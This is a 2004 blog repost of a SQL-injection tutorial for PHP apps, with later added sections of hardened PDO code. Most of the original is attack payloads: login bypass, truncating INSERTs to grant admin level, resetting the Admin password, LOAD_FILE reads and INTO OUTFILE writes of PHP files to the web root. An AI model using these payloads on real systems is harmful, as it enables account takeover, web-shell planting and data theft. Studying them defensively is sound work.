≮六づ道≯'s Blog


Author: 黄殿瑶 (ID: feel8)
    PHP Injection (original post)


    PHP injection, condensed edition, compiled by 小夜; I have added notes in a few places.
    The article is fairly thorough. It mainly covers injection into three kinds of SQL statement:

    1- SELECT
    2- INSERT
    3- UPDATE

    $req = "SELECT * FROM membres WHERE name LIKE '%$search%' ORDER BY name"


    where $search is the variable the user can modify, coming from a POST form (or some other source) of this type:


    <form method="POST" action="<? echo $PHP_SELF; ?>">
    <input type="text" name="search"><br>
    <input type="submit" value="Search">
    </form>

    SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name

    $req = "SELECT uid FROM admins WHERE login='$login' AND password='$pass'"

    SELECT * FROM table WHERE 1=1
    SELECT * FROM table WHERE 'uuu'='uuu'
    SELECT * FROM table WHERE 1<>2
    SELECT * FROM table WHERE 3>2
    SELECT * FROM table WHERE 2<3
    SELECT * FROM table WHERE 1
    SELECT * FROM table WHERE 1+1
    SELECT * FROM table WHERE 1--1
    SELECT * FROM table WHERE ISNULL(NULL)
    SELECT * FROM table WHERE ISNULL(COT(0))
    SELECT * FROM table WHERE 1 IS NOT NULL
    SELECT * FROM table WHERE NULL IS NULL
    SELECT * FROM table WHERE 2 BETWEEN 1 AND 3
    SELECT * FROM table WHERE 'b' BETWEEN 'a' AND 'c'
    SELECT * FROM table WHERE 2 IN (0,1,2)
    SELECT * FROM table WHERE CASE WHEN 1>0 THEN 1 END ------- (小猪 has been using this one for ages, heh.)


    SELECT uid FROM admins WHERE login='' OR 'a'='a' AND password='' OR 'a'='a'

    SELECT uid FROM admins WHERE login='John' AND password='' OR 'b' BETWEEN 'a' AND 'c'

    SELECT * FROM table WHERE nom='Jack'# comment

    SELECT * FROM table WHERE nom='Jack'


    SELECT * FROM table WHERE /* comments */ addresse='25 rue des roubys'

    SELECT * FROM table WHERE addresse='25 rue des roubys'

    SELECT uid FROM admins WHERE login='John'#' AND password=''

    SELECT uid FROM admins WHERE login='' OR admin_level=1#' AND password=''

    $req = "SELECT password FROM admins WHERE login='$login'"

    SELECT * FROM table INTO OUTFILE '/complete/path/to/file.txt' ---- dumps the table to a file.


    SELECT password FROM admins WHERE login='John' INTO DUMPFILE '/path/to/site/file.txt'

    http://[target]/file.txt
    frog' INTO OUTFILE '/path/to/site/file.php

    $req = "SELECT uid FROM membres WHERE login='$login' AND password='$pass'"

    SELECT * FROM table WHERE msg LIKE '%hop'

    SELECT * FROM table WHERE msg LIKE 'hop%'

    SELECT * FROM table WHERE msg LIKE '%hop%'

    SELECT * FROM table WHERE msg LIKE 'h%p'

    SELECT * FROM table WHERE msg LIKE 'h_p'


    SELECT uid FROM membres WHERE login='Bob' AND password LIKE 'a%'#' AND password=''


    SELECT uid FROM membres WHERE login='Bob' AND LENGTH(password)=6#' AND password=''


    $req = "SELECT email, website FROM membres WHERE name LIKE '%$search%' ORDER BY name"


    SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name


    $req = "SELECT email, website FROM membres WHERE name LIKE '%$search%' ORDER BY $orderby"

    That covers injection into SELECT. Everything mentioned above we already knew well; let's move on.
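The SELECT cases above, as an added example that is not part of the original article or its French source: the vulnerable string-concatenation helper next to a hardened PDO version, including the two places where a placeholder alone is not enough (the LIKE wildcards and the `$orderby` column). Table and column names (`admins`, `membres`, `uid`, `login`, `password`, `name`, `email`, `website`) follow the article; the DSN, the credentials and the function names are assumptions for illustration.

```php
<?php
// Added example, not code from the original article. Assumed: a MySQL
// database 'site' reachable on localhost with the account 'webuser'.

// Vulnerable: interpolating user input lets a quote or a '#' comment
// rewrite the statement, exactly as the admins examples above show.
function build_login_query_unsafe(string $login, string $pass): string
{
    return "SELECT uid FROM admins WHERE login='$login' AND password='$pass'";
}

// Hardened: placeholders keep the SQL structure fixed; the values travel
// separately and can never terminate the string literal.
function find_admin_uid(PDO $pdo, string $login, string $pass): ?int
{
    $stmt = $pdo->prepare('SELECT uid FROM admins WHERE login = :login AND password = :pass');
    $stmt->execute([':login' => $login, ':pass' => $pass]);
    $uid = $stmt->fetchColumn();
    return $uid === false ? null : (int) $uid;
}

// LIKE: the wildcards are added to the bound value, not to the SQL text,
// and any '%' or '_' typed by the user is escaped so it matches literally
// (MySQL's default LIKE escape character is the backslash).
// ORDER BY cannot be bound as a parameter, so the column name comes from a
// whitelist; this is the $orderby case in the last SELECT above.
function search_members(PDO $pdo, string $search, string $orderby): array
{
    $allowed = ['name', 'email', 'website'];
    if (!in_array($orderby, $allowed, true)) {
        $orderby = 'name';
    }
    $pattern = '%' . addcslashes($search, '%_\\') . '%';
    $stmt = $pdo->prepare("SELECT email, website FROM membres WHERE name LIKE :pattern ORDER BY `$orderby`");
    $stmt->execute([':pattern' => $pattern]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// ATTR_EMULATE_PREPARES => false makes PDO use real server-side prepared
// statements instead of quoting the values on the client.
$pdo = new PDO('mysql:host=localhost;dbname=site;charset=utf8mb4', 'webuser', 'secret', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

// Constructed input: the login-bypass value from the article.
$login = "' OR 'a'='a";
$pass  = "' OR 'a'='a";

// What MySQL would receive from the vulnerable helper: the same rewritten
// statement as the first admins example above.
echo build_login_query_unsafe($login, $pass), "\n";

// With placeholders the same input is just a string that matches no row.
var_dump(find_admin_uid($pdo, $login, $pass));
var_dump(search_members($pdo, "%' ORDER BY uid#", 'uid; DROP TABLE membres'));
```

Two caveats that follow from the cases above. The `INTO OUTFILE` and `INTO DUMPFILE` examples only work if the database account holds the MySQL `FILE` privilege, so the account the web application connects with should not be granted it, and `secure_file_priv` limits where the server may write at all. Storing and comparing the password inside the SQL statement, as the article's schema does, is also best replaced by fetching a `password_hash()` value and checking it in PHP with `password_verify()`.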

    INSERT:

    CREATE TABLE membres (
    id int(10) NOT NULL auto_increment,
    login varchar(25),
    password varchar(25),
    nom varchar(30),
    email varchar(30),
    userlevel tinyint,
    PRIMARY KEY (id)
    )


    $query1 = "INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email','1')"


    INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('','','','','3')#','1')


    CREATE TABLE membres (
    id int(10) NOT NULL auto_increment,
    login varchar(25),
    password varchar(25),
    nom varchar(30),
    email varchar(30),
    userlevel tinyint default '1',
    PRIMARY KEY (id)
    )

    $query2 = "INSERT INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'"


    INSERT INTO membres SET login='',password='',nom='',userlevel='3',email=''


    CREATE TABLE membres (
    id varchar(15) NOT NULL default '',
    login varchar(25),
    password varchar(25),
    nom varchar(30),
    email varchar(30),
    userlevel tinyint,
    PRIMARY KEY (id)
    )


    $query3 = "INSERT INTO membres VALUES ('$id','$login','$pass','$nom','$email','1')"


    INSERT INTO membres VALUES ('[ID]','[LOGIN]','[PASS]','[NOM]','a@a.a','3')#','1')


    As you can see, the key to INSERT injection is truncation: close the VALUES list with `)` and append a comment so the rest of the original statement is ignored. No problem, simple enough. Moving on.

    Exploiting UPDATE


    CREATE TABLE membres (
    id int(10) NOT NULL auto_increment,
    login varchar(25),
    password varchar(25),
    nom varchar(30),
    email varchar(30),
    userlevel tinyint,
    PRIMARY KEY (id)
    )


    $sql = "UPDATE membres SET password='$pass',nom='$nom',email='$email' WHERE id='$id'"


    UPDATE membres SET password='[PASS]',nom='',userlevel='3',email=' ' WHERE id='[ID]'


    UPDATE membres SET password='[nouveaupass]' WHERE nom='Admin'#',nom='[NOM]',email=' ' WHERE id='[ID]'


    UPDATE membres SET password='[nouveaupass]' WHERE nom='Admin'


    UPDATE membres SET password='[PASS]',nom='[NOM]',email=' ' WHERE id='' OR name='Admin'


    CREATE TABLE news (
    idnews int(10) NOT NULL auto_increment,
    title varchar(50),
    author varchar(20),
    news text,
    Votes int(5),
    score int(15),
    PRIMARY KEY (idnews)
    )


    $sql = "UPDATE news SET Votes=Votes+1, score=score+$note WHERE idnews='$id'"

    UPDATE news SET Votes=Votes+1, score=score+3, title='hop' WHERE idnews='12'

    UPDATE news SET Votes=Votes+1, score=score+3,Votes=0 WHERE idnews='12'

    UPDATE news SET Votes=Votes+1, score=score+3, title=char(104,111,112) WHERE idnews='12'

    To obtain these character codes, use the ASCII() or ORD() function: ASCII('h') and ORD('h') both give 104.


    UPDATE news SET Votes=Votes+1, score=score+3, title=0x616263 WHERE idnews='12'
    SELECT CONV("abc",16,3), CONV("abc",16,8)


    DATABASE() and USER() (or SYSTEM_USER(), CURRENT_USER() or SESSION_USER())

    UPDATE news SET Votes=Votes+1, score=score+3, title=DATABASE() WHERE idnews='12'

    UPDATE news SET Votes=Votes+1, score=score+3, news=LOAD_FILE('/tmp/picture') WHERE idnews='12'
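The INSERT and UPDATE cases above, hardened in one added example that is not code from the original article or its French source. It covers the three defensive points those sections raise: naming every INSERT column and setting `userlevel` from the code rather than from input, binding the unquoted numeric `$id` and `$note` of the news UPDATE as integers (quoting does not help in a numeric context), and scoping a password UPDATE by the session's user id so no form field chooses the row. Table and column names (`membres`, `news`, `Votes`, `score`, `idnews`, `userlevel`, `nom`) follow the article; `$pdo` is assumed to be a PDO connection opened with `PDO::ATTR_EMULATE_PREPARES => false`, and the function names and the 1..5 vote range are assumptions for illustration.

```php
<?php
// Added example, not code from the original article. Assumed: $pdo is a
// PDO MySQL connection created with PDO::ATTR_EMULATE_PREPARES => false
// and PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION.

// INSERT: every column is named and userlevel is a literal chosen by the
// code. With placeholders a value such as  ','','','','3')#  stays inside
// its own field instead of closing the VALUES list early.
function register_member(PDO $pdo, string $login, string $pass, string $nom, string $email): int
{
    $stmt = $pdo->prepare(
        'INSERT INTO membres (login, password, nom, email, userlevel) VALUES (:login, :pass, :nom, :email, 1)'
    );
    $stmt->execute([':login' => $login, ':pass' => $pass, ':nom' => $nom, ':email' => $email]);
    return (int) $pdo->lastInsertId();
}

// UPDATE with unquoted numbers: $id and $note are validated as integers
// and bound with PDO::PARAM_INT, so neither "3, title='hop'" nor
// "3,Votes=0" can reach the statement text. The vote is also range-checked
// so one request cannot move score by an arbitrary amount.
function vote_on_news(PDO $pdo, $id, $note): bool
{
    if (filter_var($id, FILTER_VALIDATE_INT) === false
        || filter_var($note, FILTER_VALIDATE_INT) === false) {
        return false;
    }
    $id   = (int) $id;
    $note = (int) $note;
    if ($note < 1 || $note > 5) {   // assumed valid vote range
        return false;
    }
    $stmt = $pdo->prepare('UPDATE news SET Votes = Votes + 1, score = score + :note WHERE idnews = :id');
    $stmt->bindValue(':note', $note, PDO::PARAM_INT);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount() === 1;   // exactly one news row was updated
}

// Password change scoped to the logged-in user: the WHERE value is the
// session's id, not a form field, so the "WHERE nom='Admin'#" rewrite has
// nothing to attach to and the client never selects the row being changed.
function change_own_password(PDO $pdo, int $sessionUserId, string $newPass): bool
{
    $stmt = $pdo->prepare('UPDATE membres SET password = :pass WHERE id = :id');
    $stmt->bindValue(':pass', $newPass, PDO::PARAM_STR);
    $stmt->bindValue(':id', $sessionUserId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount() === 1;   // false when the id matched nothing or nothing changed
}

// Constructed inputs taken from the cases above; each is rejected or
// stored verbatim rather than interpreted as SQL.
$newId = register_member($pdo, "','','','','3')#", 'pw', 'Jack', 'a@a.a');
var_dump(vote_on_news($pdo, '12', "3, title='hop'"));   // rejected: not an integer
var_dump(vote_on_news($pdo, '12', '3'));                 // accepted
var_dump(change_own_password($pdo, $newId, "x' WHERE nom='Admin'#"));
```

`rowCount()` on a MySQL UPDATE reports rows actually changed, so `change_own_password()` returns false when the new password equals the old one; treat that as "nothing to do" rather than as an attack signal. Because the web account should not own the `FILE` privilege, the `LOAD_FILE('/tmp/picture')` case above fails at the privilege check even before the statement structure is considered.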

    Posted on 2004-10-29 19:52:00

    Copyright © 六道